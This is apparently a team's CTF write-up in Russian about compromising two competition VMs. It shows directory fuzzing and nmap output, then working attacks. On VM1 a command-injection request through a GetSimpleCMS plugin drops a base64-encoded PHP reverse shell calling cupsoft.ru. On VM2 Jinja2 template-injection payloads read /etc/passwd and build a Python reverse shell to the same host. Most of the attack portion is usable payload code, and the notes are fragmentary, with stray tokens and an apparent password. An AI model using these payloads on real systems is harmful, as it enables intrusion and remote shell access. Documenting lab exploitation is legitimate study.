# InnoOpen ## Выполнили Команда “CupTeam”: - shybert - S0meOdy - menad - user3 ## Тестируемые устройства Машинка|IP -|- VM1|158.160.40.203 VM2|158.160.48.7 ## Машина 1 На виртуальной машине VM1 открыты следующие порты: Порт|Сервис -|- 22|SSH (OpenSSH 8.9p1)(Организаторов) 80|HTTP (nginx/1.18.0) ### Поиск директорий ``` [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 29ms] * FUZZ: admin [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 33ms] * FUZZ: admin/ [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 36ms] * FUZZ: admin/download.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 35ms] * FUZZ: admin/index.php [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 35ms] * FUZZ: admin/upload.php [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 27ms] * FUZZ: backups [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 28ms] * FUZZ: backups/ [Status: 200, Size: 1370328, Words: 5198, Lines: 5242, Duration: 38ms] * FUZZ: backup.tgz [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 26ms] * FUZZ: data/ [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 26ms] * FUZZ: data/cache/ [Status: 200, Size: 224, Words: 37, Lines: 8, Duration: 28ms] * FUZZ: index.php [Status: 200, Size: 35147, Words: 5836, Lines: 675, Duration: 44ms] * FUZZ: LICENSE.txt [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 24ms] * FUZZ: plugins [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 61ms] * FUZZ: plugins/ ``` **backup**   `trun-mailcap"`   ``` GET /plugins/InnovationPlugin/lang/flag.php?CMD=echo+PD9waHAKJGlwID0gJ2N1cHNvZnQucnUnOyAgLy8gQ0hBTkdFIFRISVMKJHBvcnQgPSAxMjM0OyAgICAgICAvLyBDSEFOR0UgVEhJUwoKc2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokY2h1bmtfc2l6ZSA9IDE0MDA7CiR3cml0ZV9hID0gbnVsbDsKJGVycm9yX2EgPSBudWxsOwokc2hlbGwgPSAndW5hbWUgLWE7IHc7IGlkOyAvYmluL3NoIC1pJzsKJGRhZW1vbiA9IDA7CiRkZWJ1ZyA9IDA7CmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewogICAgICAgIC8vIEZvcmsgYW5kIGhhdmUgdGhlIHBhcmVudCBwcm9jZXNzIGV4aXQKICAgICAgICAkcGlkID0gcGNudGxfZm9yaygpOwoKICAgICAgICBpZiAoJHBpZCA9PSAtMSkgewogICAgICAgICAgICAgICAgcHJpbnRpdCgiRVJST1I6IENhbid0IGZvcmsiKTsKICAgICAgICAgICAgICAgIGV4aXQoMSk7CiAgICAgICAgfQoKICAgICAgICBpZiAoJHBpZCkgewogICAgICAgICAgICAgICAgZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwogICAgICAgIH0KICAgICAgICBpZiAocG9zaXhfc2V0c2lkKCkgPT0gLTEpIHsKICAgICAgICAgICAgICAgIHByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOwogICAgICAgICAgICAgICAgZXhpdCgxKTsKICAgICAgICB9CgogICAgICAgICRkYWVtb24gPSAxOwp9IGVsc2UgewogICAgICAgIHByaW50aXQoIldBUk5JTkc6IEZhaWxlZCB0byBkYWVtb25pc2UuICBUaGlzIGlzIHF1aXRlIGNvbW1vbiBhbmQgbm90IGZhdGFsLiIpOwp9CmNoZGlyKCIvIik7CnVtYXNrKDApOwokc29jayA9IGZzb2Nrb3BlbigkaXAsICRwb3J0LCAkZXJybm8sICRlcnJzdHIsIDMwKTsKaWYgKCEkc29jaykgewogICAgICAgIHByaW50aXQoIiRlcnJzdHIgKCRlcnJubykiKTsKICAgICAgICBleGl0KDEpOwp9CiRkZXNjcmlwdG9yc3BlYyA9IGFycmF5KAogICAwID0%2bIGFycmF5KCJwaXBlIiwgInIiKSwKICAgMSA9PiBhcnJheSgicGlwZSIsICJ3IiksCiAgIDIgPT4gYXJyYXkoInBpcGUiLCAidyIpCik7CiRwcm9jZXNzID0gcHJvY19vcGVuKCRzaGVsbCwgJGRlc2NyaXB0b3JzcGVjLCAkcGlwZXMpOwppZiAoIWlzX3Jlc291cmNlKCRwcm9jZXNzKSkgewogICAgICAgIHByaW50aXQoIkVSUk9SOiBDYW4ndCBzcGF3biBzaGVsbCIpOwogICAgICAgIGV4aXQoMSk7Cn0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMF0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1sxXSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzJdLCAwKTsKc3RyZWFtX3NldF9ibG9ja2luZygkc29jaywgMCk7CnByaW50aXQoIlN1Y2Nlc3NmdWxseSBvcGVuZWQgcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQiKTsKd2hpbGUgKDEpIHsKICAgICAgICBpZiAoZmVvZigkc29jaykpIHsKICAgICAgICAgICAgICAgIHByaW50aXQoIkVSUk9SOiBTaGVsbCBjb25uZWN0aW9uIHRlcm1pbmF0ZWQiKTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgIH0KICAgICAgICBpZiAoZmVvZigkcGlwZXNbMV0pKSB7CiAgICAgICAgICAgICAgICBwcmludGl0KCJFUlJPUjogU2hlbGwgcHJvY2VzcyB0ZXJtaW5hdGVkIik7CiAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICB9CiAgICAgICAgJHJlYWRfYSA9IGFycmF5KCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7CiAgICAgICAgJG51bV9jaGFuZ2VkX3NvY2tldHMgPSBzdHJlYW1fc2VsZWN0KCRyZWFkX2EsICR3cml0ZV9hLCAkZXJyb3JfYSwgbnVsbCk7CiAgICAgICAgaWYgKGluX2FycmF5KCRzb2NrLCAkcmVhZF9hKSkgewogICAgICAgICAgICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSyBSRUFEIik7CiAgICAgICAgICAgICAgICAkaW5wdXQgPSBmcmVhZCgkc29jaywgJGNodW5rX3NpemUpOwogICAgICAgICAgICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSzogJGlucHV0Iik7CiAgICAgICAgICAgICAgICBmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwogICAgICAgIH0KICAgICAgICBpZiAoaW5fYXJyYXkoJHBpcGVzWzFdLCAkcmVhZF9hKSkgewogICAgICAgICAgICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RET1VUIFJFQUQiKTsKICAgICAgICAgICAgICAgICRpbnB1dCA9IGZyZWFkKCRwaXBlc1sxXSwgJGNodW5rX3NpemUpOwogICAgICAgICAgICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RET1VUOiAkaW5wdXQiKTsKICAgICAgICAgICAgICAgIGZ3cml0ZSgkc29jaywgJGlucHV0KTsKICAgICAgICB9CiAgICAgICAgaWYgKGluX2FycmF5KCRwaXBlc1syXSwgJHJlYWRfYSkpIHsKICAgICAgICAgICAgICAgIGlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUiBSRUFEIik7CiAgICAgICAgICAgICAgICAkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMl0sICRjaHVua19zaXplKTsKICAgICAgICAgICAgICAgIGlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUjogJGlucHV0Iik7CiAgICAgICAgICAgICAgICBmd3JpdGUoJHNvY2ssICRpbnB1dCk7CiAgICAgICAgfQp9CgpmY2xvc2UoJHNvY2spOwpmY2xvc2UoJHBpcGVzWzBdKTsKZmNsb3NlKCRwaXBlc1sxXSk7CmZjbG9zZSgkcGlwZXNbMl0pOwpwcm9jX2Nsb3NlKCRwcm9jZXNzKTsKZnVuY3Rpb24gcHJpbnRpdCAoJHN0cmluZykgewogICAgICAgIGlmICghJGRhZW1vbikgewogICAgICAgICAgICAgICAgcHJpbnQgIiRzdHJpbmdcbiI7CiAgICAgICAgfQp9Cj8%2bCg%3d%3d+|+base64+-d+>+rev.php HTTP/1.1 ``` http://www.securityspace.com/smysecure/catid.html?id=1.3.6.1.4.1.25623.1.0.142569 Deformater Пароль rHHY2e ``` GET /plugins/InnovationPlugin/lang/flag.php?CMD=echo+PD9waHAKJGlwID0gJ2N1cHNvZnQucnUnOyAgLy8gQ0hBTkdFIFRISVMKJHBvcnQgPSAxMjM0OyAgICAgICAvLyBDSEFOR0UgVEhJUwoKc2V0X3RpbWVfbGltaXQgKDApOwokVkVSU0lPTiA9ICIxLjAiOwokY2h1bmtfc2l6ZSA9IDE0MDA7CiR3cml0ZV9hID0gbnVsbDsKJGVycm9yX2EgPSBudWxsOwokc2hlbGwgPSAndW5hbWUgLWE7IHc7IGlkOyAvYmluL3NoIC1pJzsKJGRhZW1vbiA9IDA7CiRkZWJ1ZyA9IDA7CmlmIChmdW5jdGlvbl9leGlzdHMoJ3BjbnRsX2ZvcmsnKSkgewogICAgICAgIC8vIEZvcmsgYW5kIGhhdmUgdGhlIHBhcmVudCBwcm9jZXNzIGV4aXQKICAgICAgICAkcGlkID0gcGNudGxfZm9yaygpOwoKICAgICAgICBpZiAoJHBpZCA9PSAtMSkgewogICAgICAgICAgICAgICAgcHJpbnRpdCgiRVJST1I6IENhbid0IGZvcmsiKTsKICAgICAgICAgICAgICAgIGV4aXQoMSk7CiAgICAgICAgfQoKICAgICAgICBpZiAoJHBpZCkgewogICAgICAgICAgICAgICAgZXhpdCgwKTsgIC8vIFBhcmVudCBleGl0cwogICAgICAgIH0KICAgICAgICBpZiAocG9zaXhfc2V0c2lkKCkgPT0gLTEpIHsKICAgICAgICAgICAgICAgIHByaW50aXQoIkVycm9yOiBDYW4ndCBzZXRzaWQoKSIpOwogICAgICAgICAgICAgICAgZXhpdCgxKTsKICAgICAgICB9CgogICAgICAgICRkYWVtb24gPSAxOwp9IGVsc2UgewogICAgICAgIHByaW50aXQoIldBUk5JTkc6IEZhaWxlZCB0byBkYWVtb25pc2UuICBUaGlzIGlzIHF1aXRlIGNvbW1vbiBhbmQgbm90IGZhdGFsLiIpOwp9CmNoZGlyKCIvIik7CnVtYXNrKDApOwokc29jayA9IGZzb2Nrb3BlbigkaXAsICRwb3J0LCAkZXJybm8sICRlcnJzdHIsIDMwKTsKaWYgKCEkc29jaykgewogICAgICAgIHByaW50aXQoIiRlcnJzdHIgKCRlcnJubykiKTsKICAgICAgICBleGl0KDEpOwp9CiRkZXNjcmlwdG9yc3BlYyA9IGFycmF5KAogICAwID0%2bIGFycmF5KCJwaXBlIiwgInIiKSwKICAgMSA9PiBhcnJheSgicGlwZSIsICJ3IiksCiAgIDIgPT4gYXJyYXkoInBpcGUiLCAidyIpCik7CiRwcm9jZXNzID0gcHJvY19vcGVuKCRzaGVsbCwgJGRlc2NyaXB0b3JzcGVjLCAkcGlwZXMpOwppZiAoIWlzX3Jlc291cmNlKCRwcm9jZXNzKSkgewogICAgICAgIHByaW50aXQoIkVSUk9SOiBDYW4ndCBzcGF3biBzaGVsbCIpOwogICAgICAgIGV4aXQoMSk7Cn0Kc3RyZWFtX3NldF9ibG9ja2luZygkcGlwZXNbMF0sIDApOwpzdHJlYW1fc2V0X2Jsb2NraW5nKCRwaXBlc1sxXSwgMCk7CnN0cmVhbV9zZXRfYmxvY2tpbmcoJHBpcGVzWzJdLCAwKTsKc3RyZWFtX3NldF9ibG9ja2luZygkc29jaywgMCk7CnByaW50aXQoIlN1Y2Nlc3NmdWxseSBvcGVuZWQgcmV2ZXJzZSBzaGVsbCB0byAkaXA6JHBvcnQiKTsKd2hpbGUgKDEpIHsKICAgICAgICBpZiAoZmVvZigkc29jaykpIHsKICAgICAgICAgICAgICAgIHByaW50aXQoIkVSUk9SOiBTaGVsbCBjb25uZWN0aW9uIHRlcm1pbmF0ZWQiKTsKICAgICAgICAgICAgICAgIGJyZWFrOwogICAgICAgIH0KICAgICAgICBpZiAoZmVvZigkcGlwZXNbMV0pKSB7CiAgICAgICAgICAgICAgICBwcmludGl0KCJFUlJPUjogU2hlbGwgcHJvY2VzcyB0ZXJtaW5hdGVkIik7CiAgICAgICAgICAgICAgICBicmVhazsKICAgICAgICB9CiAgICAgICAgJHJlYWRfYSA9IGFycmF5KCRzb2NrLCAkcGlwZXNbMV0sICRwaXBlc1syXSk7CiAgICAgICAgJG51bV9jaGFuZ2VkX3NvY2tldHMgPSBzdHJlYW1fc2VsZWN0KCRyZWFkX2EsICR3cml0ZV9hLCAkZXJyb3JfYSwgbnVsbCk7CiAgICAgICAgaWYgKGluX2FycmF5KCRzb2NrLCAkcmVhZF9hKSkgewogICAgICAgICAgICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSyBSRUFEIik7CiAgICAgICAgICAgICAgICAkaW5wdXQgPSBmcmVhZCgkc29jaywgJGNodW5rX3NpemUpOwogICAgICAgICAgICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU09DSzogJGlucHV0Iik7CiAgICAgICAgICAgICAgICBmd3JpdGUoJHBpcGVzWzBdLCAkaW5wdXQpOwogICAgICAgIH0KICAgICAgICBpZiAoaW5fYXJyYXkoJHBpcGVzWzFdLCAkcmVhZF9hKSkgewogICAgICAgICAgICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RET1VUIFJFQUQiKTsKICAgICAgICAgICAgICAgICRpbnB1dCA9IGZyZWFkKCRwaXBlc1sxXSwgJGNodW5rX3NpemUpOwogICAgICAgICAgICAgICAgaWYgKCRkZWJ1ZykgcHJpbnRpdCgiU1RET1VUOiAkaW5wdXQiKTsKICAgICAgICAgICAgICAgIGZ3cml0ZSgkc29jaywgJGlucHV0KTsKICAgICAgICB9CiAgICAgICAgaWYgKGluX2FycmF5KCRwaXBlc1syXSwgJHJlYWRfYSkpIHsKICAgICAgICAgICAgICAgIGlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUiBSRUFEIik7CiAgICAgICAgICAgICAgICAkaW5wdXQgPSBmcmVhZCgkcGlwZXNbMl0sICRjaHVua19zaXplKTsKICAgICAgICAgICAgICAgIGlmICgkZGVidWcpIHByaW50aXQoIlNUREVSUjogJGlucHV0Iik7CiAgICAgICAgICAgICAgICBmd3JpdGUoJHNvY2ssICRpbnB1dCk7CiAgICAgICAgfQp9CgpmY2xvc2UoJHNvY2spOwpmY2xvc2UoJHBpcGVzWzBdKTsKZmNsb3NlKCRwaXBlc1sxXSk7CmZjbG9zZSgkcGlwZXNbMl0pOwpwcm9jX2Nsb3NlKCRwcm9jZXNzKTsKZnVuY3Rpb24gcHJpbnRpdCAoJHN0cmluZykgewogICAgICAgIGlmICghJGRhZW1vbikgewogICAgICAgICAgICAgICAgcHJpbnQgIiRzdHJpbmdcbiI7CiAgICAgICAgfQp9Cj8%2bCg%3d%3d+|+base64+-d+>+rev.php ```` exploit - https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1352 ## 2 машина `export ip2=158.160.48.7` ### fast nmap scan `sudo nmap $ip2` ``` PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 07:00:86:ed:8c:8c:c1:da:f1:53:c3:fa:d9:b4:5c:69 (ECDSA) |_ 256 35:13:90:06:b3:fd:25:8e:af:81:c1:96:75:0d:a7:03 (ED25519) 25/tcp filtered smtp Aggressive OS guesses: Linux 5.0 (92%), Linux 5.0 - 5.4 (92%), Linux 5.4 (91%), HP P2000 G3 NAS device (90%), Linux 4.15 - 5.6 (90%), Linux 5.3 - 5.4 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Infomir MAG-250 set-top box (89%), Ubiquiti AirMax NanoStation WAP (Linux 2.6.32) (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 12 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` TBqm4x ### full TCP nmap scan `sudo nmap -T4 -p- -sC -sV $ip2` ``` SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 070086ed8c8cc1daf153c3fad9b45c69 (ECDSA) |_ 256 35139006b3fd258eaf81c196750da703 (ED25519) 1337/tcp open waste? | fingerprint-strings: | GenericLines: | HTTP/1.1 400 Bad Request | Connection: close | Content-Type: text/html | Content-Length: 193 | <html> | <head> | <title>Bad Request</title> | </head> | <body> | <h1><p>Bad Request</p></h1> | Invalid Request Line &#x27;Invalid HTTP request line: &#x27;&#x27;&#x27; | </body> | </html> | GetRequest: | HTTP/1.0 200 OK | Server: gunicorn | Date: Sun, 26 Feb 2023 06:23:49 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Content-Length: 2348 | <!DOCTYPE html> | <html lang="en"> | <head> | <meta charset="utf-8"> | <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> | <meta http-equiv="x-ua-compatible" content="ie=edge"> | <title>Image Reader</title> | <!-- Font Awesome --> | <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.8.2/css/all.css"> | <!-- Bootstrap core CSS --> | <link href="/static/css/bootstrap.min.css" rel="stylesheet"> | <!-- Material Design Bootstrap --> | <link href="/static/css/mdb.min.css" rel="stylesheet"> | <!-- Your custom styles (optional) --> | <link href="/static/css/style.css" rel="stylesheet"> | </head> | <body> | <div class="container"> | class="text-center" sty | HTTPOptions: | HTTP/1.0 200 OK | Server: gunicorn | Date: Sun, 26 Feb 2023 06:23:50 GMT | Connection: close | Content-Type: text/html; charset=utf-8 | Allow: HEAD, OPTIONS, GET |_ Content-Length: 0 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service : SF-Port1337-TCP:V=7.93%I=7%D=2/26%Time=63FAFAF5%P=x86_64-pc-linux-gnu%r(Ge SF:nericLines,11E,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nConnection:\x20cl SF:ose\r\nContent-Type:\x20text/html\r\nContent-Length:\x20193\r\n\r\n<htm SF:l>\n\x20\x20<head>\n\x20\x20\x20\x20<title>Bad\x20Request</title>\n\x20 SF:\x20</head>\n\x20\x20<body>\n\x20\x20\x20\x20<h1><p>Bad\x20Request</p>< SF:/h1>\n\x20\x20\x20\x20Invalid\x20Request\x20Line\x20&#x27;Invalid\x20HT SF:TP\x20request\x20line:\x20&#x27;&#x27;&#x27;\n\x20\x20</body>\n</html>\ SF:n")%r(GetRequest,9C7,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\n SF:Date:\x20Sun,\x2026\x20Feb\x202023\x2006:23:49\x20GMT\r\nConnection:\x2 SF:0close\r\nContent-Type:\x20text/html;\x20charset=utf-8\r\nContent-Lengt SF:h:\x202348\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head>\n\x SF:20\x20\x20\x20<meta\x20charset=\"utf-8\">\n\x20\x20\x20\x20<meta\x20nam SF:e=\"viewport\"\x20content=\"width=device-width,\x20initial-scale=1,\x20 SF:shrink-to-fit=no\">\n\x20\x20\x20\x20<meta\x20http-equiv=\"x-ua-compati SF:ble\"\x20content=\"ie=edge\">\n\x20\x20\x20\x20<title>Image\x20Reader</ SF:title>\n\n\x20\x20\x20\x20<!--\x20Font\x20Awesome\x20-->\n\x20\x20\x20\ SF:x20<link\x20rel=\"stylesheet\"\x20href=\"https://use\.fontawesome\.com/ SF:releases/v5\.8\.2/css/all\.css\">\n\n\x20\x20\x20\x20<!--\x20Bootstrap\ SF:x20core\x20CSS\x20-->\n\x20\x20\x20\x20<link\x20href=\"/static/css/boot SF:strap\.min\.css\"\x20rel=\"stylesheet\">\n\n\x20\x20\x20\x20<!--\x20Mat SF:erial\x20Design\x20Bootstrap\x20-->\n\x20\x20\x20\x20<link\x20href=\"/s SF:tatic/css/mdb\.min\.css\"\x20rel=\"stylesheet\">\n\n\x20\x20\x20\x20<!- SF:-\x20Your\x20custom\x20styles\x20\(optional\)\x20-->\n\x20\x20\x20\x20< SF:link\x20href=\"/static/css/style\.css\"\x20rel=\"stylesheet\">\n</head> SF:\n<body>\n\n\n\n\x20\x20\x20\x20<div\x20class=\"container\">\n\x20\x20\ SF:x20\x20\x20\x20\x20\x20<h1\x20class=\"text-center\"\x20sty")%r(HTTPOpti SF:ons,B3,"HTTP/1\.0\x20200\x20OK\r\nServer:\x20gunicorn\r\nDate:\x20Sun,\ SF:x2026\x20Feb\x202023\x2006:23:50\x20GMT\r\nConnection:\x20close\r\nCont SF:ent-Type:\x20text/html;\x20charset=utf-8\r\nAllow:\x20HEAD,\x20OPTIONS, SF:\x20GET\r\nContent-Length:\x200\r\n\r\n"); Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ``` ### Payloads ```{{ get_flashed_messages.__globals__.__builtins__.open("/etc/passwd").read() }}``` root:x:0:0:root:/root:/bin/bash jury:x:1000:1001::/home/jury:/bin/bash srv_reader:x:1001:1002:,,,:/home/srv_reader:/bin/bash ubuntu:x:1002:1003:Ubuntu:/home/ubuntu:/bin/bash ```{{ get_flashed_messages.__globals__.__builtins__.open("/home/srv_reader/flag.txt").read() }}``` ``` Flag: ``` 1 ``` {{ get_flashed_messages.__globals__.__builtins__.open("/tmp/b", "w").write("import socket,subprocess,os;s=socket.socket") }} ``` 2 ``` {{ get_flashed_messages.__globals__.__builtins__.open("/tmp/b", "a").write("(socket.AF_INET,socket.SOCK_STREAM);") }} ``` 3 ``` {{ get_flashed_messages.__globals__.__builtins__.open("/tmp/b", "a").write("s.connect(('cupsoft.ru',6666));") }} ``` 4 ``` {{ get_flashed_messages.__globals__.__builtins__.open("/tmp/b", "a").write("import pty; pty.spawn('sh')") }} ``` exploit ``` import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('cupsoft.ru',6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('sh') ```